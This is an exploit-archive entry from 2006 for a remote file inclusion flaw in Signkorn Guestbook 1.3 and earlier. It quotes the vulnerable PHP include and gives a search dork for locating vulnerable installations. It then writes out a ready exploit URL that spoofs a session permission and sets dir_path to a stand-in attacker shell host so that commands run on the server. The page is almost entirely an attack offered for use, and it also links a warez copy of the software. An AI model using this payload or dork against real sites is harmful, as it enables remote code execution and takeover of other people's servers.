[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Signkorn Guestbook <= 1.3 (dir_path) Remote File Include Vulnerability
# Published : 2006-09-12
# Author : SHiKaA
# Previous Title : Vitrax Pre-modded <= 1.0.6-r3 Remote File Include Vulnerability
# Next Title : MiniPort@l <= 0.1.5 beta (skiny) Remote File Include Vulnerability
#==============================================================================================
#Signkorn Guestbook <= v1.3 (dir_path) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://warez.gtasoft.ru/skripts/SignKorn.Guestbook.(SL).v1.1.PHP.NULL-DGT.zip
#
#Version : v1.3 & all versions bellow
#
#================================================================================================
#
#Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2"
#
#================================================================================================
#Bug in : includes/log.inc.php
#
#Vlu Code :
#--------------------------------
# if ($_SESSION['permission'] == "yes") {
#
# // ########### Admin Menu #############
# include($dir_path . '/includes/admin.menu.inc.php');
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/includes/log.inc.php?_SESSION[permission]=yes&dir_path=http://SHELLURL.COM?&cmd=id
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : CCtream - Cyper-worrier team
# Special Thx To : Str0ke & simoo
==================================================================================================
# www.Syue.com [2006-09-12]